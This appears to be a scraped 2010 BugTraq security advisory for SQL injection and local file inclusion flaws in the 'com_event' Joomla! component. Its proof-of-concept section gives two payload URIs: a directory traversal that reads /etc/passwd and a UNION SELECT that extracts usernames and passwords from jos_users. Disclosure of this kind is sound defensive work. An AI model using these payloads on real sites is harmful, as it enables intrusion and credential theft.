'com_event' Joomla! Component SQL Injection and Local File Include Vulnerabilities
BID:40200
Info
'com_event' Joomla! Component SQL Injection and Local File Include Vulnerabilities
| Bugtraq ID: | 40200 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 17 2010 12:00AM |
| Updated: | May 17 2010 12:00AM |
| Credit: | altbta |
| Vulnerable: |
Joomla com_event 0 |
| Not Vulnerable: | |
Discussion
'com_event' Joomla! Component SQL Injection and Local File Include Vulnerabilities
The 'com_event' Joomla! component is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; by using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
The 'com_event' Joomla! component is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; by using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
Exploit / POC
'com_event' Joomla! Component SQL Injection and Local File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?option=com_event&view=../../../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/index.php?option=com_event&task=details&sid=-61 union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?option=com_event&view=../../../../../../../../../../../../../../../etc/passwd%00
http://www.example.com/index.php?option=com_event&task=details&sid=-61 union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--
References
'com_event' Joomla! Component SQL Injection and Local File Include Vulnerabilities
References:
References:
- Joomla! Homepage (Joomla!)